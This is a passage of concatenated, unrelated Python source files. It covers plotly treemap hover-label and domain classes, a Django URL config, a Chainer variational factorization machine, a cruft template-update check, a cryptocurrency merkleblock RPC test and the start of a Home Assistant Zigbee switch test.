greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bgcolor"]
@bgcolor.setter
def bgcolor(self, val):
self["bgcolor"] = val
# bgcolorsrc
# ----------
@property
def bgcolorsrc(self):
"""
Sets the source reference on plot.ly for bgcolor .
The 'bgcolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bgcolorsrc"]
@bgcolorsrc.setter
def bgcolorsrc(self, val):
self["bgcolorsrc"] = val
# bordercolor
# -----------
@property
def bordercolor(self):
"""
Sets the border color of the hover labels for this trace.
The 'bordercolor' property is a color and may be specified as:
- A hex string (e.g. '#ff0000')
- An rgb/rgba string (e.g. 'rgb(255,0,0)')
- An hsl/hsla string (e.g. 'hsl(0,100%,50%)')
- An hsv/hsva string (e.g. 'hsv(0,100%,100%)')
- A named CSS color:
aliceblue, antiquewhite, aqua, aquamarine, azure,
beige, bisque, black, blanchedalmond, blue,
blueviolet, brown, burlywood, cadetblue,
chartreuse, chocolate, coral, cornflowerblue,
cornsilk, crimson, cyan, darkblue, darkcyan,
darkgoldenrod, darkgray, darkgrey, darkgreen,
darkkhaki, darkmagenta, darkolivegreen, darkorange,
darkorchid, darkred, darksalmon, darkseagreen,
darkslateblue, darkslategray, darkslategrey,
darkturquoise, darkviolet, deeppink, deepskyblue,
dimgray, dimgrey, dodgerblue, firebrick,
floralwhite, forestgreen, fuchsia, gainsboro,
ghostwhite, gold, goldenrod, gray, grey, green,
greenyellow, honeydew, hotpink, indianred, indigo,
ivory, khaki, lavender, lavenderblush, lawngreen,
lemonchiffon, lightblue, lightcoral, lightcyan,
lightgoldenrodyellow, lightgray, lightgrey,
lightgreen, lightpink, lightsalmon, lightseagreen,
lightskyblue, lightslategray, lightslategrey,
lightsteelblue, lightyellow, lime, limegreen,
linen, magenta, maroon, mediumaquamarine,
mediumblue, mediumorchid, mediumpurple,
mediumseagreen, mediumslateblue, mediumspringgreen,
mediumturquoise, mediumvioletred, midnightblue,
mintcream, mistyrose, moccasin, navajowhite, navy,
oldlace, olive, olivedrab, orange, orangered,
orchid, palegoldenrod, palegreen, paleturquoise,
palevioletred, papayawhip, peachpuff, peru, pink,
plum, powderblue, purple, red, rosybrown,
royalblue, rebeccapurple, saddlebrown, salmon,
sandybrown, seagreen, seashell, sienna, silver,
skyblue, slateblue, slategray, slategrey, snow,
springgreen, steelblue, tan, teal, thistle, tomato,
turquoise, violet, wheat, white, whitesmoke,
yellow, yellowgreen
- A list or array of any of the above
Returns
-------
str|numpy.ndarray
"""
return self["bordercolor"]
@bordercolor.setter
def bordercolor(self, val):
self["bordercolor"] = val
# bordercolorsrc
# --------------
@property
def bordercolorsrc(self):
"""
Sets the source reference on plot.ly for bordercolor .
The 'bordercolorsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["bordercolorsrc"]
@bordercolorsrc.setter
def bordercolorsrc(self, val):
self["bordercolorsrc"] = val
# font
# ----
@property
def font(self):
"""
Sets the font used in hover labels.
The 'font' property is an instance of Font
that may be specified as:
- An instance of plotly.graph_objs.treemap.hoverlabel.Font
- A dict of string/value properties that will be passed
to the Font constructor
Supported dict properties:
color
colorsrc
Sets the source reference on plot.ly for color
.
family
HTML font family - the typeface that will be
applied by the web browser. The web browser
will only be able to apply a font if it is
available on the system which it operates.
Provide multiple font families, separated by
commas, to indicate the preference in which to
apply fonts if they aren't available on the
system. The plotly service (at https://plot.ly
or on-premise) generates images on a server,
where only a select number of fonts are
installed and supported. These include "Arial",
"Balto", "Courier New", "Droid Sans",, "Droid
Serif", "Droid Sans Mono", "Gravitas One", "Old
Standard TT", "Open Sans", "Overpass", "PT Sans
Narrow", "Raleway", "Times New Roman".
familysrc
Sets the source reference on plot.ly for
family .
size
sizesrc
Sets the source reference on plot.ly for size
.
Returns
-------
plotly.graph_objs.treemap.hoverlabel.Font
"""
return self["font"]
@font.setter
def font(self, val):
self["font"] = val
# namelength
# ----------
@property
def namelength(self):
"""
Sets the default length (in number of characters) of the trace
name in the hover labels for all traces. -1 shows the whole
name regardless of length. 0-3 shows the first 0-3 characters,
and an integer >3 will show the whole name if it is less than
that many characters, but if it is longer, will truncate to
`namelength - 3` characters and add an ellipsis.
The 'namelength' property is an integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [-1, 9223372036854775807]
- A tuple, list, or one-dimensional numpy array of the above
Returns
-------
int|numpy.ndarray
"""
return self["namelength"]
@namelength.setter
def namelength(self, val):
self["namelength"] = val
# namelengthsrc
# -------------
@property
def namelengthsrc(self):
"""
Sets the source reference on plot.ly for namelength .
The 'namelengthsrc' property must be specified as a string or
as a plotly.grid_objs.Column object
Returns
-------
str
"""
return self["namelengthsrc"]
@namelengthsrc.setter
def namelengthsrc(self, val):
self["namelengthsrc"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
"""
def __init__(
self,
arg=None,
align=None,
alignsrc=None,
bgcolor=None,
bgcolorsrc=None,
bordercolor=None,
bordercolorsrc=None,
font=None,
namelength=None,
namelengthsrc=None,
**kwargs
):
"""
Construct a new Hoverlabel object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Hoverlabel
align
Sets the horizontal alignment of the text content
within hover label box. Has an effect only if the hover
label text spans two or more lines
alignsrc
Sets the source reference on plot.ly for align .
bgcolor
Sets the background color of the hover labels for this
trace
bgcolorsrc
Sets the source reference on plot.ly for bgcolor .
bordercolor
Sets the border color of the hover labels for this
trace.
bordercolorsrc
Sets the source reference on plot.ly for bordercolor .
font
Sets the font used in hover labels.
namelength
Sets the default length (in number of characters) of
the trace name in the hover labels for all traces. -1
shows the whole name regardless of length. 0-3 shows
the first 0-3 characters, and an integer >3 will show
the whole name if it is less than that many characters,
but if it is longer, will truncate to `namelength - 3`
characters and add an ellipsis.
namelengthsrc
Sets the source reference on plot.ly for namelength .
Returns
-------
Hoverlabel
"""
super(Hoverlabel, self).__init__("hoverlabel")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Hoverlabel
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Hoverlabel"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import hoverlabel as v_hoverlabel
# Initialize validators
# ---------------------
self._validators["align"] = v_hoverlabel.AlignValidator()
self._validators["alignsrc"] = v_hoverlabel.AlignsrcValidator()
self._validators["bgcolor"] = v_hoverlabel.BgcolorValidator()
self._validators["bgcolorsrc"] = v_hoverlabel.BgcolorsrcValidator()
self._validators["bordercolor"] = v_hoverlabel.BordercolorValidator()
self._validators["bordercolorsrc"] = v_hoverlabel.BordercolorsrcValidator()
self._validators["font"] = v_hoverlabel.FontValidator()
self._validators["namelength"] = v_hoverlabel.NamelengthValidator()
self._validators["namelengthsrc"] = v_hoverlabel.NamelengthsrcValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("align", None)
self["align"] = align if align is not None else _v
_v = arg.pop("alignsrc", None)
self["alignsrc"] = alignsrc if alignsrc is not None else _v
_v = arg.pop("bgcolor", None)
self["bgcolor"] = bgcolor if bgcolor is not None else _v
_v = arg.pop("bgcolorsrc", None)
self["bgcolorsrc"] = bgcolorsrc if bgcolorsrc is not None else _v
_v = arg.pop("bordercolor", None)
self["bordercolor"] = bordercolor if bordercolor is not None else _v
_v = arg.pop("bordercolorsrc", None)
self["bordercolorsrc"] = bordercolorsrc if bordercolorsrc is not None else _v
_v = arg.pop("font", None)
self["font"] = font if font is not None else _v
_v = arg.pop("namelength", None)
self["namelength"] = namelength if namelength is not None else _v
_v = arg.pop("namelengthsrc", None)
self["namelengthsrc"] = namelengthsrc if namelengthsrc is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
from plotly.basedatatypes import BaseTraceHierarchyType as _BaseTraceHierarchyType
import copy as _copy
class Domain(_BaseTraceHierarchyType):
# column
# ------
@property
def column(self):
"""
If there is a layout grid, use the domain for this column in
the grid for this treemap trace .
The 'column' property is an integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["column"]
@column.setter
def column(self, val):
self["column"] = val
# row
# ---
@property
def row(self):
"""
If there is a layout grid, use the domain for this row in the
grid for this treemap trace .
The 'row' property is an integer and may be specified as:
- An int (or float that will be cast to an int)
in the interval [0, 9223372036854775807]
Returns
-------
int
"""
return self["row"]
@row.setter
def row(self, val):
self["row"] = val
# x
# -
@property
def x(self):
"""
Sets the horizontal domain of this treemap trace (in plot
fraction).
The 'x' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'x[0]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
(1) The 'x[1]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
list
"""
return self["x"]
@x.setter
def x(self, val):
self["x"] = val
# y
# -
@property
def y(self):
"""
Sets the vertical domain of this treemap trace (in plot
fraction).
The 'y' property is an info array that may be specified as:
* a list or tuple of 2 elements where:
(0) The 'y[0]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
(1) The 'y[1]' property is a number and may be specified as:
- An int or float in the interval [0, 1]
Returns
-------
list
"""
return self["y"]
@y.setter
def y(self, val):
self["y"] = val
# property parent name
# --------------------
@property
def _parent_path_str(self):
return "treemap"
# Self properties description
# ---------------------------
@property
def _prop_descriptions(self):
return """\
column
If there is a layout grid, use the domain for this
column in the grid for this treemap trace .
row
If there is a layout grid, use the domain for this row
in the grid for this treemap trace .
x
Sets the horizontal domain of this treemap trace (in
plot fraction).
y
Sets the vertical domain of this treemap trace (in plot
fraction).
"""
def __init__(self, arg=None, column=None, row=None, x=None, y=None, **kwargs):
"""
Construct a new Domain object
Parameters
----------
arg
dict of properties compatible with this constructor or
an instance of plotly.graph_objs.treemap.Domain
column
If there is a layout grid, use the domain for this
column in the grid for this treemap trace .
row
If there is a layout grid, use the domain for this row
in the grid for this treemap trace .
x
Sets the horizontal domain of this treemap trace (in
plot fraction).
y
Sets the vertical domain of this treemap trace (in plot
fraction).
Returns
-------
Domain
"""
super(Domain, self).__init__("domain")
# Validate arg
# ------------
if arg is None:
arg = {}
elif isinstance(arg, self.__class__):
arg = arg.to_plotly_json()
elif isinstance(arg, dict):
arg = _copy.copy(arg)
else:
raise ValueError(
"""\
The first argument to the plotly.graph_objs.treemap.Domain
constructor must be a dict or
an instance of plotly.graph_objs.treemap.Domain"""
)
# Handle skip_invalid
# -------------------
self._skip_invalid = kwargs.pop("skip_invalid", False)
# Import validators
# -----------------
from plotly.validators.treemap import domain as v_domain
# Initialize validators
# ---------------------
self._validators["column"] = v_domain.ColumnValidator()
self._validators["row"] = v_domain.RowValidator()
self._validators["x"] = v_domain.XValidator()
self._validators["y"] = v_domain.YValidator()
# Populate data dict with properties
# ----------------------------------
_v = arg.pop("column", None)
self["column"] = column if column is not None else _v
_v = arg.pop("row", None)
self["row"] = row if row is not None else _v
_v = arg.pop("x", None)
self["x"] = x if x is not None else _v
_v = arg.pop("y", None)
self["y"] = y if y is not None else _v
# Process unknown kwargs
# ----------------------
self._process_kwargs(**dict(arg, **kwargs))
# Reset skip_invalid
# ------------------
self._skip_invalid = False
__all__ = [
"Domain",
"Hoverlabel",
"Insidetextfont",
"Marker",
"Outsidetextfont",
"Pathbar",
"Stream",
"Textfont",
"Tiling",
"hoverlabel",
"marker",
"pathbar",
]
from plotly.graph_objs.treemap import pathbar
from plotly.graph_objs.treemap import marker
from plotly.graph_objs.treemap import hoverlabel
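# Usage sketch for the classes above (assuming the public
# plotly.graph_objects entry point):
#
# import plotly.graph_objects as go
# fig = go.Figure(go.Treemap(
#     labels=["root", "A", "B"],
#     parents=["", "root", "root"],
#     domain=dict(x=[0, 1], y=[0, 1]),
#     hoverlabel=dict(bgcolor="white", namelength=-1),
# ))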
|
from django.conf.urls import url, include
from django.contrib import admin
from django.contrib.auth import views
urlpatterns = [
url(r'^admin/', admin.site.urls),
url(r'',include('instagram.urls')),
url(r'^accounts/', include('registration.backends.simple.urls')),
url(r'^logout/$', views.logout, {"next_page": '/'}),
]
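# Note: django.contrib.auth.views.logout was removed in Django 2.1; on newer
# versions the equivalent class-based route would be (a sketch, keeping the
# same "/" redirect):
#
# from django.contrib.auth.views import LogoutView
# url(r'^logout/$', LogoutView.as_view(next_page='/')),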
|
import chainer
from chainer import training
from chainer.training import extensions
from chainer.datasets import TupleDataset
from chainer import Chain
from chainer import links as L
from chainer import functions as F
from chainer import reporter
from chainer import cuda
import numpy as np
def dot(a, b):
""" Simple dot product"""
return F.sum(a * b, axis=-1)
def batch_interactions(x):
xp = cuda.get_array_module(x.data)
batchsize = x.shape[0]
shape = (batchsize, x.shape[1] ** 2)
left = xp.tile(x.data, (1, x.shape[1]))
right = xp.repeat(x.data, x.shape[1]).reshape(shape)
return left, right
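# Shape sketch for batch_interactions (illustrative, with nf = x.shape[1]):
# for x of shape (bs, nf), `left` tiles each row nf times while `right`
# repeats each element nf times, so position k of left/right enumerates
# all nf**2 ordered pairs (x_i, x_j); both outputs have shape (bs, nf**2).
#
# x = chainer.Variable(np.array([[1., 2.]]))  # bs=1, nf=2
# left, right = batch_interactions(x)
# # left  -> [[1., 2., 1., 2.]]
# # right -> [[1., 1., 2., 2.]]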
class VFM(Chain):
lv_floor = -100.0
def __init__(self, n_features=None, n_dim=1, lossfun=F.mean_squared_error,
lambda0=1, lambda1=1, lambda2=1, init_bias_mu=0.0,
init_bias_lv=0.0, intx_term=True, total_nobs=1):
self.n_dim = n_dim
self.n_features = n_features
self.lossfun = lossfun
self.lambda0 = lambda0
self.lambda1 = lambda1
self.lambda2 = lambda2
self.intx_term = intx_term
self.total_nobs = total_nobs
# In contrast to the FM model, the slopes and latent vectors
# will have means (mu) and log variances (lv) for each component.
super(VFM, self).__init__(bias_mu=L.Bias(shape=(1,)),
bias_lv=L.Bias(shape=(1,)),
slop_mu=L.Bias(shape=(1, 1)),
slop_lv=L.Bias(shape=(1, 1)),
slop_delta_mu=L.EmbedID(n_features, 1,
ignore_label=-1),
slop_delta_lv=L.EmbedID(n_features, 1,
ignore_label=-1),
feat_mu_vec=L.Bias(shape=(1, 1, n_dim)),
feat_lv_vec=L.Bias(shape=(1, 1, n_dim)),
feat_delta_mu=L.EmbedID(n_features, n_dim,
ignore_label=-1),
feat_delta_lv=L.EmbedID(n_features, n_dim,
ignore_label=-1))
# Xavier initialize weights
c = np.sqrt(n_features * n_dim) * 1e3
d = np.sqrt(n_features) * 1e3
self.feat_delta_mu.W.data[...] = np.random.randn(n_features, n_dim) / c
self.feat_delta_lv.W.data[...] = np.random.randn(n_features, n_dim) / c
self.slop_delta_mu.W.data[...] = np.random.randn(n_features, 1) / d
self.slop_delta_lv.W.data[...] = np.random.randn(n_features, 1) / d
self.bias_mu.b.data[...] *= 0.0
self.bias_mu.b.data[...] += init_bias_mu
self.bias_lv.b.data[...] *= 0.0
self.bias_lv.b.data[...] += init_bias_lv
def term_bias(self, bs, train=True):
""" Compute overall bias and broadcast to shape of batchsize
"""
shape = (bs, 1,)
# Bias is drawn from a Gaussian with given mu and log variance
bs_mu = F.broadcast_to(self.bias_mu.b, shape)
bs_lv = F.broadcast_to(self.bias_lv.b, shape)
bias = F.flatten(F.gaussian(bs_mu, bs_lv))
# Add a very negative log variance so we're sampling
# from a very narrow distribution about the mean.
# Useful for the validation dataset when we only want to
# guess the mean.
if not train:
bs_lv += self.lv_floor
# Compute the prior on the bias as the KL divergence
# KL(N(mu_bias, var_bias) || N(0, 1))
kld = F.gaussian_kl_divergence(self.bias_mu.b, self.bias_lv.b)
return bias, kld
def term_slop(self, loc, val, bs, nf, train=True):
""" Compute the slope for each active feature.
"""
shape = (bs, nf)
# Reshape all of our constants
pr_mu = F.broadcast_to(self.slop_mu.b, shape)
pr_lv = F.broadcast_to(self.slop_lv.b, shape)
# This is either zero or a very negative number
# indicating to sample N(mean, logvar) or just draw
# the mean precisely
if not train:
pr_lv += self.lv_floor
# The feature slopes are grouped together so that they
# all share a common mean. Then the individual feature deltas
# are shrunk towards zero, which effectively makes features fall
# back on the group mean.
sl_mu = F.reshape(self.slop_delta_mu(loc), shape) + pr_mu
sl_lv = F.reshape(self.slop_delta_lv(loc), shape) + pr_lv
coef = F.gaussian(sl_mu, sl_lv)
slop = F.sum(coef * val, axis=1)
# Calculate divergence between group mean and N(0, 1)
kld1 = F.gaussian_kl_divergence(self.slop_mu.b, self.slop_lv.b)
# Calculate divergence of individual delta means and delta vars
args = (self.slop_delta_mu.W, self.slop_delta_lv.W)
kld2 = F.gaussian_kl_divergence(*args)
return slop, kld1 + kld2
def term_feat(self, iloc, jloc, ival, jval, bs, nf, train=True):
# Change all of the shapes to form interaction vectors
shape = (bs, nf * 2, self.n_dim)
feat_mu_vec = F.broadcast_to(self.feat_mu_vec.b, shape)
feat_lv_vec = F.broadcast_to(self.feat_lv_vec.b, shape)
if not train:
feat_lv_vec += self.lv_floor
# Construct the interaction mean and variance
# iloc is (bs, nf), feat(iloc) is (bs, nf, ndim) and
# dot(feat, feat) is (bs, nf)
ivec = F.gaussian(feat_mu_vec + self.feat_delta_mu(iloc),
feat_lv_vec + self.feat_delta_lv(iloc))
jvec = F.gaussian(feat_mu_vec + self.feat_delta_mu(jloc),
feat_lv_vec + self.feat_delta_lv(jloc))
# feat is (bs, )
feat = dot(F.sum(ivec * jvec, axis=2), ival * jval)
# Compute the KLD for the group mean vector and variance vector
kld1 = F.gaussian_kl_divergence(self.feat_mu_vec.b, self.feat_lv_vec.b)
# Compute the KLD for vector deviations from the group mean and var
kld2 = F.gaussian_kl_divergence(self.feat_delta_mu.W,
self.feat_delta_lv.W)
return feat, kld1 + kld2
def forward(self, loc, val, y, train=True):
""" Given the sparse feature vector defined by location
integers for the column index and the value at that index.
y ~ c + sum(w_i x_i) + sum_ij( <v_i, v_j> * x_i * x_j)
Parameters
----------
val : array of float
Values in the feature array. Should be of shape (batchsize, n_feat_max)
loc : array of int
Location of the non-zero columns in the sparse vector. Should be of
shape (batchsize, n_feat_max)
y : array of float
Array of expected outcome.
train: bool
If True uses the reparameterization trick to estimate variables.
If False, this sets the variance to nearly zero such that
parameters are always set to the mean with no noise, which is useful
at test time.
"""
bs = val.data.shape[0]
nf = val.data.shape[1]
iloc, jloc = batch_interactions(loc)
ival, jval = batch_interactions(val)
# Compute scalar bias term
bias, kld0 = self.term_bias(bs, train=train)
# Compute the feature weights
slop, kld1 = self.term_slop(loc, val, bs, nf, train=train)
# Compute factorized weights on interaction features
feat, kld2 = self.term_feat(iloc, jloc, ival, jval,
bs, nf, train=train)
# Optionally choose to include the interaction term;
# without it the model reduces to linear regression
pred = bias + slop
if self.intx_term:
pred += feat
return pred, kld0, kld1, kld2
def __call__(self, loc, val, y, train=True):
bs = val.data.shape[0]
pred, kld0, kld1, kld2 = self.forward(loc, val, y, train=train)
# Compute MSE loss
mse = F.mean_squared_error(pred, y)
rmse = F.sqrt(mse) # Only used for reporting
# Now compute the total KLD loss
kldt = kld0 * self.lambda0 + kld1 * self.lambda1 + kld2 * self.lambda2
# Total loss is MSE plus regularization losses
loss = mse + kldt * (1.0 / self.total_nobs)
# Log the errors
logs = {'loss': loss, 'rmse': rmse, 'kld0': kld0, 'kld1': kld1,
'kld2': kld2, 'kldt': kldt, 'bias': F.sum(self.bias_mu.b)}
reporter.report(logs, self)
return loss
class TestModeEvaluator(extensions.Evaluator):
def evaluate(self):
model = self.get_target('main')
model.train = False
ret = super(TestModeEvaluator, self).evaluate()
model.train = True
return ret
def fit(model, train, valid, device=-1, batchsize=4096, n_epoch=500,
resume=None, alpha=1e-3):
if device >= 0:
chainer.cuda.get_device(device).use()
model.to_gpu(device)
optimizer = chainer.optimizers.Adam(alpha)
optimizer.setup(model)
# Setup iterators
train_iter = chainer.iterators.SerialIterator(train, batchsize)
valid_iter = chainer.iterators.SerialIterator(valid, batchsize,
repeat=False, shuffle=False)
updater = training.StandardUpdater(train_iter, optimizer, device=device)
trainer = training.Trainer(updater, (n_epoch, 'epoch'),
out='out_' + str(device))
# Setup logging, printing & saving
# Keys must match the entries reported in VFM.__call__
keys = ['loss', 'rmse', 'bias', 'kld0', 'kld1', 'kld2', 'kldt']
reports = ['epoch']
reports += ['main/' + key for key in keys]
reports += ['validation/main/rmse']
trainer.extend(TestModeEvaluator(valid_iter, model, device=device))
trainer.extend(extensions.Evaluator(valid_iter, model, device=device))
trainer.extend(extensions.dump_graph('main/loss'))
trainer.extend(extensions.snapshot(), trigger=(10, 'epoch'))
trainer.extend(extensions.LogReport(trigger=(1, 'epoch')))
trainer.extend(extensions.PrintReport(reports))
trainer.extend(extensions.ProgressBar(update_interval=10))
# If previous model detected, resume
if resume:
print("Loading from {}".format(resume))
chainer.serializers.load_npz(resume, trainer)
# Run the model
trainer.run()
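# Minimal usage sketch (synthetic data and assumed shapes, not part of the
# original script): loc holds the active column indices of each sparse row,
# val the matching values, and y the regression target.
#
# n_obs, n_feat_max, n_features = 1000, 4, 100
# loc = np.random.randint(0, n_features, (n_obs, n_feat_max)).astype('i')
# val = np.random.rand(n_obs, n_feat_max).astype('f')
# y = np.random.rand(n_obs).astype('f')
# train = TupleDataset(loc[:800], val[:800], y[:800])
# valid = TupleDataset(loc[800:], val[800:], y[800:])
# model = VFM(n_features=n_features, n_dim=8, total_nobs=800)
# fit(model, train, valid, device=-1, batchsize=256, n_epoch=10)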
|
import json
from pathlib import Path
from typing import Optional
import typer
from . import utils
from .utils import example
from .utils.iohelper import AltTemporaryDirectory
@example()
def check(
project_dir: Path = Path("."), checkout: Optional[str] = None, strict: bool = True
) -> bool:
"""Checks to see if there have been any updates to the Cookiecutter template
used to generate this project."""
cruft_file = utils.cruft.get_cruft_file(project_dir)
cruft_state = json.loads(cruft_file.read_text())
with AltTemporaryDirectory() as cookiecutter_template_dir:
with utils.cookiecutter.get_cookiecutter_repo(
cruft_state["template"],
Path(cookiecutter_template_dir),
checkout,
filter="blob:none",
no_checkout=True,
) as repo:
last_commit = repo.head.object.hexsha
if utils.cruft.is_project_updated(repo, cruft_state["commit"], last_commit, strict):
typer.secho(
"SUCCESS: Good work! Project's cruft is up to date "
"and as clean as possible :).",
fg=typer.colors.GREEN,
)
return True
typer.secho(
"FAILURE: Project's cruft is out of date! Run `cruft update` to clean this mess up.",
fg=typer.colors.RED,
)
return False
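# Usage sketch (assuming the standard typer CLI wiring around this command):
#
#   cruft check --checkout main
#
# The command prints SUCCESS/FAILURE as above and returns True only when the
# project is up to date with its Cookiecutter template.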
|
#!/usr/bin/env python2
# Copyright (c) 2014-2020 The Bitcoin Core developers
# Copyright (c) 2014-2020 The Skicoin Core developers
# Distributed under the MIT software license, see the accompanying
# file COPYING or http://www.opensource.org/licenses/mit-license.php.
#
# Test merkleblock fetch/validation
#
from test_framework.test_framework import SkicoinTestFramework
from test_framework.util import *
class MerkleBlockTest(SkicoinTestFramework):
def setup_chain(self):
print("Initializing test directory "+self.options.tmpdir)
initialize_chain_clean(self.options.tmpdir, 4)
def setup_network(self):
self.nodes = []
# Nodes 0/1 are "wallet" nodes
self.nodes.append(start_node(0, self.options.tmpdir, ["-debug"]))
self.nodes.append(start_node(1, self.options.tmpdir, ["-debug"]))
# Nodes 2/3 are used for testing
self.nodes.append(start_node(2, self.options.tmpdir, ["-debug"]))
self.nodes.append(start_node(3, self.options.tmpdir, ["-debug", "-txindex"]))
connect_nodes(self.nodes[0], 1)
connect_nodes(self.nodes[0], 2)
connect_nodes(self.nodes[0], 3)
self.is_network_split = False
self.sync_all()
def run_test(self):
print "Mining blocks..."
self.nodes[0].generate(105)
self.sync_all()
chain_height = self.nodes[1].getblockcount()
assert_equal(chain_height, 105)
assert_equal(self.nodes[1].getbalance(), 0)
assert_equal(self.nodes[2].getbalance(), 0)
node0utxos = self.nodes[0].listunspent(1)
tx1 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 500})
txid1 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx1)["hex"])
tx2 = self.nodes[0].createrawtransaction([node0utxos.pop()], {self.nodes[1].getnewaddress(): 500})
txid2 = self.nodes[0].sendrawtransaction(self.nodes[0].signrawtransaction(tx2)["hex"])
assert_raises(JSONRPCException, self.nodes[0].gettxoutproof, [txid1])
self.nodes[0].generate(1)
blockhash = self.nodes[0].getblockhash(chain_height + 1)
self.sync_all()
txlist = []
blocktxn = self.nodes[0].getblock(blockhash, True)["tx"]
txlist.append(blocktxn[1])
txlist.append(blocktxn[2])
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1])), [txid1])
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2], blockhash)), txlist)
txin_spent = self.nodes[1].listunspent(1).pop()
tx3 = self.nodes[1].createrawtransaction([txin_spent], {self.nodes[0].getnewaddress(): 500})
self.nodes[0].sendrawtransaction(self.nodes[1].signrawtransaction(tx3)["hex"])
self.nodes[0].generate(1)
self.sync_all()
txid_spent = txin_spent["txid"]
txid_unspent = txid1 if txin_spent["txid"] != txid1 else txid2
# We can't find the block from a fully-spent tx
# Doesn't apply to Skicoin Core - we have txindex always on
# assert_raises(JSONRPCException, self.nodes[2].gettxoutproof, [txid_spent])
# ...but we can if we specify the block
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_spent], blockhash)), [txid_spent])
# ...or if the first tx is not fully-spent
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid_unspent])), [txid_unspent])
try:
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid1, txid2])), txlist)
except JSONRPCException:
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[2].gettxoutproof([txid2, txid1])), txlist)
# ...or if we have a -txindex
assert_equal(self.nodes[2].verifytxoutproof(self.nodes[3].gettxoutproof([txid_spent])), [txid_spent])
if __name__ == '__main__':
MerkleBlockTest().main()
|
"""Test zha switch."""
from unittest.mock import call, patch
import pytest
import zigpy.zcl.clusters.general as general
import zigpy.zcl.foundation as zcl_f
from homeassistant.components.switch import DOMAIN
from homeassistant.const import STATE_OFF, STATE_ON, STATE_UNAVAILABLE
from .common import (
async_enable_traffic,
find_entity_id,
make_attribute,
make_zcl_header,
)
from tests.common import mock_coro
ON = 1
OFF = 0
@pytest.fixture
def zigpy_device(zigpy_device_mock):
"""Device tracker zigpy device."""
endpoints = {
1: {
"in_clusters": [general.Basic.cluster_id, general.OnOff.cluster_id],
"out_clusters": [],
"device_type": 0,
}
}
return zigpy_device_mock(endpoints)
async def test_switch(hass, zha_gateway, zha_device_joined_restored, zigpy_device):
"""Test zha switch platform."""
zha_device = await zha_device_joined_restored(zigpy_device)
cluster = zigpy_device.endpoints.get(1).on_off
entity_id = await find_entity_id(DOMAIN, zha_device, hass)
assert entity_id is not None
# test that the switch was created and that its state is unavailable
assert hass.states.get(entity_id).state == STATE_UNAVAILABLE
# allow traffic to flow through the gateway and device
await async_enable_traffic(hass, zha_gateway, [zha_device])
# test that the state has changed from unavailable to off
assert hass.states.get(entity_id).state == STATE_OFF
# turn on at switch
attr = make_attribute(0, 1)
hdr = make_zcl_header(zcl_f.Command.Report_Attributes)
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_ON
# turn off at switch
attr.value.value = 0
cluster.handle_message(hdr, [[attr]])
await hass.async_block_till_done()
assert hass.states.get(entity_id).state == STATE_OFF
# turn on from HA
with patch(
